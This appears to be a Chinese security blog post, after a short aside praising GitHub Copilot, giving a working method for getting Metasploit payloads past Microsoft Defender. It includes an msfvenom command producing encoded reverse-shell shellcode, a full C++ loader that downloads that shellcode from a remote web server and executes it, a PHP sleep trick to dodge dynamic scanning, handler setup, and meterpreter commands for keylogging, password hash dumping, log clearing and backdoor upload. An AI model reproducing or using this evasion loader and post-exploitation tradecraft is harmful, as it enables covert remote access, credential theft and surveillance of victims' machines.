Category: Security

不得不说,用了两个月,https://copilot.github.com/  GitHub Copilot这玩意神了,原来nlp技术现在已经到这种地步了,基本等于超越时代版代码提示,和编辑器默认版比就是小灵通和安卓手机的区别,国外把nlp技术应用到有实际意义的工作和科研环境中,比如提高工作效率的工具上,国内把nlp技术应用到监管层的内容安全审查上….

Metasploit免杀过Defender

本地环境: windows11专业版 vs2022 c++14

远程环境: ubuntu20 web环境: apache2 php7

微软的Defender过,持续静默执行,不太敏感的操作,基本发现不了,截个图 读读文件列列目录是没毛病,其他的渣渣杀软也没太大压力。

思路: exe和shellcode分离,远程加载shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 \b '\x00' LHOST=192.0.0.1 LPORT=3331 -f raw > test1.txt

执行逻辑,把shellcode保存进test1.txt,test1.txt放在web目录,通过c++ https远程读取并执行,期间通过c++ https访问,服务端php 进行强制sleep绕过动态查杀

<?php
    sleep(20);
?>

vs2022编译执行,关闭DEP(数据执行保护),便于shellcode远程加载执行。

#pragma warning( disable : 4996)
#include <string>
#include <windows.h>
#include <winhttp.h>
#include<iostream>
#pragma comment(lib, "winhttp.lib")
#pragma comment(linker, "/section:.data,RWE")
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )


using namespace std;
unsigned char pp1[10000];
char random_str[] = "aaa12#@$111#@$#@22222aaaa#@^&^^%&$%$#$#$#%$#%$11ass2$#%$#%$11ass2a大飒飒大撒大所大sasa1111111#!$#%$#%$11ass2asasa1111111#!$#%$#%$11ass2asasa1111111#!asasa1111111#!#[email protected]#[email protected]#";
char tree[30] = "adsdasasd";
LPSTR http_res(const wchar_t* domain, const wchar_t* UrlPath) {

	HINTERNET hSession = NULL;
	HINTERNET hConnect = NULL;
	HINTERNET hRequest = NULL;

	//1. 初始化一个WinHTTP-session句柄,参数1为此句柄的名称
	hSession = WinHttpOpen(L"WinHTTP Example/1.0",
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS, 0);

	if (hSession == NULL) {
		cout << "Error:Open session failed: " << GetLastError() << endl;
		exit(0);
	}

	//2. 通过上述句柄连接到服务器,需要指定服务器IP和端口号 INTERNET_DEFAULT_HTTP_PORT:80。若连接成功,返回的hConnect句柄不为NULL
	hConnect = WinHttpConnect(hSession, domain, INTERNET_DEFAULT_HTTP_PORT, 0);
	if (hConnect == NULL) {
		cout << "Error:Connect failed: " << GetLastError() << endl;
		exit(0);
	}

	//3. 通过hConnect句柄创建一个hRequest句柄,用于发送数据与读取从服务器返回的数据。
	hRequest = WinHttpOpenRequest(hConnect, L"GET", UrlPath, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

	if (hRequest == NULL) {
		cout << "Error:OpenRequest failed: " << GetLastError() << endl;
		exit(0);
	}

	BOOL bResults;
	bResults = WinHttpSendRequest(hRequest,
		WINHTTP_NO_ADDITIONAL_HEADERS,
		0, WINHTTP_NO_REQUEST_DATA, 0,
		0, 0);

	if (!bResults) {
		cout << "Error:SendRequest failed: " << GetLastError() << endl;
		exit(0);
	}
	else {
		//(3) 发送请求成功则准备接受服务器的response。注意:在使用 WinHttpQueryDataAvailable和WinHttpReadData前必须使用WinHttpReceiveResponse才能access服务器返回的数据
		bResults = WinHttpReceiveResponse(hRequest, NULL);
	}


	LPVOID lpHeaderBuffer = NULL;
	DWORD dwSize = 0;
	//4-3. 获取服务器返回数据
	LPSTR pszOutBuffer = NULL;
	DWORD dwDownloaded = 0;         //实际收取的字符数
	wchar_t* pwText = NULL;
	if (bResults)
	{
		do
		{
			//(1) 获取返回数据的大小(以字节为单位)
			dwSize = 0;
			if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
				break;
			}
			if (!dwSize)    break;  //数据大小为0                

			//(2) 根据返回数据的长度为buffer申请内存空间
			pszOutBuffer = new char[dwSize + 1];
			if (!pszOutBuffer) {
				cout << "Out of memory." << endl;
				break;
			}
			ZeroMemory(pszOutBuffer, dwSize + 1);       //将buffer置0

			//(3) 通过WinHttpReadData读取服务器的返回数据
			if (!WinHttpReadData(hRequest, pszOutBuffer, dwSize, &dwDownloaded)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
			}
			if (!dwDownloaded)
				break;


		} while (dwSize > 0);


	}
	return pszOutBuffer;
}

int main()
{	
	int a_num = 1;
	//char domain[] = "www.qq.comccccccccc";
	LPSTR ccc = http_res(L"www.guimaizi.com",L"/a/sleep.php?xx1dsdsdsadsa2asassa1312dsdsx4xxxaxx$2xxx");
	std::cout << "\nccc " << &ccc << std::endl;
	while (true) {
		Sleep(6);
		LPSTR cccc = http_res(L"www.guimaizi.com", L"/a/sleep.php?xx1dsdsdsadsaasas2asassa1312dsdsx4xxxaxx$2xxx");
		std::cout << "\nccc " << &cccc << std::endl;
		LPSTR aaa = http_res(L"www.guimaizi.com", L"/a/test1.txt?xx1d4dasa#$%$#%$#%3dsdsx4xxxaxx$2xxx");
		std::cout << "\naaa " << &aaa << std::endl;
		std::cout << "\naaa " << aaa << std::endl;
		memcpy(tree, random_str, 800);
		memcpy(pp1, aaa, 800);
		Sleep(6);
		std::cout << "\ncccccc " << pp1 << std::endl;
		Sleep(6);
		__asm
		{
			mov eax, offset pp1
			inc ebx
			inc ebx
			//inc ebx
			inc ebx
			mov ebx, 0322h
			inc ebx
			mov ebx, 0322h
			inc ebx
			mov ebx, 0012h
			inc ebx
			inc ebx
			inc ebx
			inc ebx
			jmp eax
			inc ebx
			inc ebx
			//inc ebx
			inc ebx
			mov ebx, 0322h
			inc ebx
			inc ebx
			mov ebx, 0012h
			inc ebx
			inc ebx
			inc ebx
		}
		Sleep(6);
		std::cout << "pp1aaaaaaaaaaaa11aa: " << std::endl;
	}

	//5. 依次关闭request,connect,session句柄
	//if (hRequest) WinHttpCloseHandle(hRequest);
	//if (hConnect) WinHttpCloseHandle(hConnect);
	//if (hSession) WinHttpCloseHandle(hSession);





}

msf server操作

use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 3331
set enablestageencoding true
set stageencoder x86/shikata_ga_nai
run

meterpreter下的命令

getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

1.将自己暂时不用的会话放在后台
background

如何返回刚才的会话
sessions -l         //查看会话
sessions -i 1       //选择刚才的会话,数字‘1’视情况而定